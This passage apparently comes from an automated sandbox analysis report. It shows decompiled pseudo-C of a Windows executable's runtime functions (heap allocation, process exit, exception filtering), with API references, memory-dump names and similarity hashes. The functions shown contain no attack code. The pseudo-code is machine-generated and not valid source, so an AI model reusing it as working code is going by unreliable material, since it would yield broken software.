				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x410918; // 0x1
				_t26 =  *0x410908; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x41091c; // 0x21d0488
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x410920, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x410918 =  *0x410918 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x410920, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x410920, 0,  *0x41091c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x410908 =  *0x410908 + 0x10;
				 *0x41091c = _t25;
				_t15 =  *0x410918; // 0x1
				goto L3;
			}

0x00403538
0x0040353d
0x00403549
0x0040357b
0x0040357b
0x00403591
0x00403594
0x0040359c
0x0040359f
0x004035cb
0x00000000
0x004035cb
0x004035ae
0x004035b6
0x004035b9
0x004035cf
0x004035d3
0x004035d5
0x004035d8
0x004035e1
0x00000000
0x004035e4
0x004035c5
0x00000000
0x004035c5
0x0040354b
0x00403560
0x00403568
0x00000000
0x00000000
0x0040356a
0x00403571
0x00403576
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 00403560
RtlAllocateHeap.NTDLL(00000008,000041C4,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 00403594
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 004035AE
HeapFree.KERNEL32(00000000,?,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 004035C5

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: d28ead1cf6bbc67ec5d101fc6d5be3af79ab5a92f936a3eded6fdb61d874581c
Instruction ID: e56c9388084e7bf3775c78df29ba9697de4bf734b389455db41c5c75bab89719
Opcode Fuzzy Hash: d28ead1cf6bbc67ec5d101fc6d5be3af79ab5a92f936a3eded6fdb61d874581c
Instruction Fuzzy Hash: B11154B1221204EFE7218F59EC95D927BB6F784725710863AF151D71F1C3B19A81CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401EAF, Relevance: 4.5, APIs: 3, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401EAF(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				void* _t6;
				intOrPtr _t7;
				intOrPtr* _t9;
				char _t14;
				intOrPtr _t20;
				intOrPtr _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t25;
				void* _t30;

				_t22 = __esi;
				_t21 = 1;
				_t25 =  *0x40efec - _t21; // 0x1
				if(_t25 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t14 = _a12;
				 *0x40efe8 = _t21;
				 *0x40efe4 = _t14;
				if(_a8 == 0) {
					_t7 =  *0x410a50; // 0x21e0520
					if(_t7 != 0) {
						_t20 =  *0x410a4c; // 0x21e0594
						_push(_t22);
						_t4 = _t20 - 4; // 0x21e0590
						_t23 = _t4;
						if(_t23 >= _t7) {
							do {
								_t9 =  *_t23;
								if(_t9 != 0) {
									 *_t9();
								}
								_t23 = _t23 - 4;
								_t30 = _t23 -  *0x410a50; // 0x21e0520
							} while (_t30 >= 0);
						}
					}
					E00401F48(0x40e080, 0x40e088);
				}
				_t6 = E00401F48(0x40e08c, 0x40e094);
				if(_t14 == 0) {
					 *0x40efec = _t21; // executed
					ExitProcess(_a4); // executed
				}
				return _t6;
			}

0x00401eaf
0x00401eb2
0x00401eb3
0x00401eb9
0x00401ec6
0x00401ec6
0x00401ed2
0x00401ed6
0x00401edc
0x00401ee2
0x00401ee4
0x00401eeb
0x00401eed
0x00401ef3
0x00401ef4
0x00401ef4
0x00401ef9
0x00401efb
0x00401efb
0x00401eff
0x00401f01
0x00401f01
0x00401f03
0x00401f06
0x00401f06
0x00401efb
0x00401f0e
0x00401f19
0x00401f1f
0x00401f2a
0x00401f34
0x00401f3a
0x00401f40
0x00401f40
0x00401f47

APIs

GetCurrentProcess.KERNEL32(?,?,00401E9A,?,00000000,00000000,00401CD8,00000000,00000000), ref: 00401EBF
TerminateProcess.KERNEL32(00000000,?,00401E9A,?,00000000,00000000,00401CD8,00000000,00000000), ref: 00401EC6
ExitProcess.KERNEL32 ref: 00401F40

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 96b6eb2b1ada3912cfdbef8f216ed4b214f40aabd0245aad77861e2d736101e7
Instruction ID: 106b3c1fb8dc7d4a6030e4ee656a70930e9b6a9562d91e5636a1f2199f02e1d3
Opcode Fuzzy Hash: 96b6eb2b1ada3912cfdbef8f216ed4b214f40aabd0245aad77861e2d736101e7
Instruction Fuzzy Hash: C3019632644302EBD621DB56FE84A5ABBA5AB50354B10443BF541732F0C778A841CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402AE5, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402AE5(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x410920 = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E00402E9B() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x410920);
						goto L3;
					}
				}
			}

0x00402af6
0x00402afe
0x00402b03
0x00402b1a
0x00402b1c
0x00402b05
0x00402b0c
0x00402b1f
0x00402b20
0x00402b0e
0x00402b14
0x00000000
0x00402b14
0x00402b0c

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00401C60,00000000), ref: 00402AF6

Part of subcall function 00402E9B: HeapAlloc.KERNEL32(00000000,00000140,00402B0A), ref: 00402EA8

HeapDestroy.KERNEL32 ref: 00402B14

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: ce039d4533960772965c2512881cf9052a29947fc4a10e7b1a5aa3380fb64f68
Instruction ID: 36968e9bad6e006537344261cfbe536220768472456b3eebf4594cea4699108f
Opcode Fuzzy Hash: ce039d4533960772965c2512881cf9052a29947fc4a10e7b1a5aa3380fb64f68
Instruction Fuzzy Hash: 11E01271361301DAEB105F70AE4DB6637E9AB84786F408436B904F41F6E7F49480E508

Uniqueness

Uniqueness Score: -1.00%

Function 00402326, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402326(void* __esi, void* __eflags, signed int _a4, struct _EXCEPTION_POINTERS* _a8) {
				signed int _t16;
				long _t17;
				void* _t20;
				void* _t22;
				signed int _t23;
				struct _EXCEPTION_POINTERS* _t25;
				intOrPtr _t27;
				signed int _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;
				intOrPtr _t36;
				signed int* _t39;

				_t16 = E00402467(_a4);
				if(_t16 == 0) {
					L27:
					_t17 = UnhandledExceptionFilter(_a8); // executed
					return _t17;
				}
				_t23 =  *(_t16 + 8);
				if(_t23 == 0) {
					goto L27;
				}
				if(_t23 == 5) {
					 *(_t16 + 8) =  *(_t16 + 8) & 0x00000000;
					_t22 = 1;
					return _t22;
				}
				if(_t23 == 1) {
					L26:
					return _t16 | 0xffffffff;
				} else {
					_t25 =  *0x40f00c; // 0x0
					_a4 = _t25;
					 *0x40f00c = _a8;
					_t27 =  *((intOrPtr*)(_t16 + 4));
					if(_t27 != 8) {
						 *(_t16 + 8) =  *(_t16 + 8) & 0x00000000;
						 *_t23(_t27);
						L25:
						_t16 = _a4;
						 *0x40f00c = _t16;
						goto L26;
					}
					_t29 =  *0x40e278; // 0x3
					_t32 =  *0x40e27c; // 0x7
					_t33 = _t32 + _t29;
					if(_t29 >= _t33) {
						L9:
						_t20 =  *_t16;
						_t36 =  *0x40e284; // 0x8c
						if(_t20 != 0xc000008e) {
							if(_t20 != 0xc0000090) {
								if(_t20 != 0xc0000091) {
									if(_t20 != 0xc0000093) {
										if(_t20 != 0xc000008d) {
											if(_t20 != 0xc000008f) {
												if(_t20 == 0xc0000092) {
													 *0x40e284 = 0x8a;
												}
											} else {
												 *0x40e284 = 0x86;
											}
										} else {
											 *0x40e284 = 0x82;
										}
									} else {
										 *0x40e284 = 0x85;
									}
								} else {
									 *0x40e284 = 0x84;
								}
							} else {
								 *0x40e284 = 0x81;
							}
						} else {
							 *0x40e284 = 0x83;
						}
						 *_t23(8,  *0x40e284);
						 *0x40e284 = _t36;
						goto L25;
					} else {
						_t34 = _t33 - _t29;
						_t39 = 0x40e208 + (_t29 + _t29 * 2) * 4;
						do {
							 *_t39 =  *_t39 & 0x00000000;
							_t39 =  &(_t39[3]);
							_t34 = _t34 - 1;
						} while (_t34 != 0);
						goto L9;
					}
				}
			}

0x0040232d
0x00402335
0x0040245b
0x0040245e
0x00000000
0x0040245e
0x0040233b
0x00402340
0x00000000
0x00000000
0x00402349
0x0040234b
0x00402351
0x00000000
0x00402351
0x0040235a
0x00402456
0x00000000
0x00402360
0x00402360
0x00402366
0x0040236c
0x00402372
0x00402378
0x00402446
0x0040244b
0x0040244e
0x0040244e
0x00402451
0x00000000
0x00402451
0x0040237e
0x00402384
0x0040238a
0x0040238f
0x004023a6
0x004023a6
0x004023a8
0x004023b3
0x004023c6
0x004023d9
0x004023ec
0x004023ff
0x00402412
0x00402425
0x00402427
0x00402427
0x00402414
0x00402414
0x00402414
0x00402401
0x00402401
0x00402401
0x004023ee
0x004023ee
0x004023ee
0x004023db
0x004023db
0x004023db
0x004023c8
0x004023c8
0x004023c8
0x004023b5
0x004023b5
0x004023b5
0x00402439
0x0040243c
0x00000000
0x00402391
0x00402394
0x00402396
0x0040239d
0x0040239d
0x004023a0
0x004023a3
0x004023a3
0x00000000
0x0040239d
0x0040238f

APIs

UnhandledExceptionFilter.KERNELBASE(?,?,?,00401CE9,?,?,00000000,00000000), ref: 0040245E

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 631f368e3a2bdf23b7bd096ab490d91b50ea6a7e5ac9330eb19f01fab016ea42
Instruction ID: 3e34c503cc9e1e44cf6145bcfce5c596b79a5f3aed20832c40bce8563d7cadb9
Opcode Fuzzy Hash: 631f368e3a2bdf23b7bd096ab490d91b50ea6a7e5ac9330eb19f01fab016ea42
Instruction Fuzzy Hash: 6B316E315062128FEB249F21EF8872A3754F704329F21857BDC59B72E1C7BC98969B0E

Uniqueness

Uniqueness Score: -1.00%

Function 00401FC9, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00401FC9(intOrPtr _a4) {
				void* _t2;
				void* _t3;
				intOrPtr _t5;
				void* _t8;

				_t5 = _a4;
				_t8 = _t5 -  *0x40e338; // 0x3f8
				if(_t8 > 0) {
					L2:
					if(_t5 == 0) {
						_t5 = 1;
					}
					_t2 = RtlAllocateHeap( *0x410920, 0, _t5 + 0x0000000f & 0xfffffff0); // executed
					return _t2;
				}
				_push(_t5); // executed
				_t3 = E0040322F(); // executed
				if(_t3 == 0) {
					goto L2;
				}
				return _t3;
			}

0x00401fca
0x00401fce
0x00401fd4
0x00401fe1
0x00401fe3
0x00401fe7
0x00401fe7
0x00401ff7
0x00000000
0x00401ff7
0x00401fd6
0x00401fd7
0x00401fdf
0x00000000
0x00000000
0x00401ffe

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,00401FAD,000000E0,00401F9A,?,0040294B,00000100,?,00000000), ref: 00401FF7

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d6adfcae63bb6029b72f618421e7ece9aa1e65c4fe6ff6d657454537ec1941c4
Instruction ID: d4a647af104930c4a41195a184d7a24c05b0180898ab37aad0a25130da19d603
Opcode Fuzzy Hash: d6adfcae63bb6029b72f618421e7ece9aa1e65c4fe6ff6d657454537ec1941c4
Instruction Fuzzy Hash: 4DE0C23385A132A7EA206755BD80BCB2B549F10760F060137FC447B2F1C3742C8141CC

Uniqueness

Uniqueness Score: -1.00%

Function 004035E9, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035E9(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

0x004035ed
0x004035f3
0x004035f6
0x004035f9
0x004035fb
0x004035ff
0x00403601
0x00403601
0x0040360e
0x0040360f
0x00403616
0x00403619
0x00403619
0x0040361c
0x0040361f
0x00403622
0x00403622
0x0040362c
0x0040363a
0x00403642
0x0040364c
0x00403654
0x00403656
0x00403659
0x00403659
0x0040365d
0x0040366a
0x00403671
0x00403679
0x0040367c
0x00403686
0x0040368e
0x00403659
0x00403695
0x00403698
0x0040369f
0x004036a0
0x004036a3
0x004036a6
0x004036a9
0x004036ac
0x004036af
0x004036b4
0x004036bb
0x004036c4
0x004036c7
0x004036ca
0x004036cc
0x004036cc
0x004036da
0x004036dd
0x00403644
0x00403644
0x00403644
0x004036e3

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,?,?,0040330F,000000E0,?,?,?,00000100), ref: 0040363A

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b8818b59d44ee81dd74aa90f1f753e2e903c2f809bb2161564c4d1ba6d8ca7d2
Instruction ID: b194c8cc373f437d19731aad16077d0e282b73b6c322f3e770f7fca132dc6843
Opcode Fuzzy Hash: b8818b59d44ee81dd74aa90f1f753e2e903c2f809bb2161564c4d1ba6d8ca7d2
Instruction Fuzzy Hash: BC31BC316006029FD324CF18C884BA5BBE4FB50368F24C6BEE1598B3E2D775EA06CB40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004036E4, Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004036E4(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x004036ea
0x004036f3
0x004036fe
0x00403701
0x00403704
0x00403716
0x0040371c
0x0040371f
0x00403722
0x00403726
0x0040372a
0x0040372d
0x00403892
0x00403898
0x0040389b
0x0040389e
0x004038a1
0x004038a4
0x004038ab
0x004038b1
0x004038b2
0x004038b5
0x004038b8
0x004038bc
0x004038bc
0x004038bd
0x004038c1
0x004038cd
0x004038ce
0x004038d1
0x004038d5
0x004038d5
0x004038d9
0x004038dc
0x004038de
0x004038e1
0x00403901
0x0040390b
0x0040390b
0x0040390f
0x00403911
0x00403918
0x00403918
0x0040391a
0x0040391c
0x0040391f
0x0040391f
0x0040391f
0x0040391f
0x004038e3
0x004038ec
0x004038f0
0x004038f2
0x004038f6
0x004038f6
0x004038f8
0x004038fd
0x004038fd
0x004038f8
0x00403922
0x00403922
0x0040392b
0x00403934
0x0040393a
0x0040393d
0x00403943
0x00403944
0x00403947
0x0040394b
0x0040394b
0x00403947
0x0040394c
0x00403953
0x00403956
0x00403959
0x0040395c
0x00403962
0x00403968
0x0040396b
0x0040396d
0x00403971
0x00403974
0x00403977
0x00403977
0x00403979
0x0040397d
0x004039a0
0x004039a4
0x004039b0
0x004039b3
0x004039b3
0x004039b3
0x004039b3
0x004039b6
0x004039bd
0x004039c0
0x0040397f
0x0040397f
0x00403983
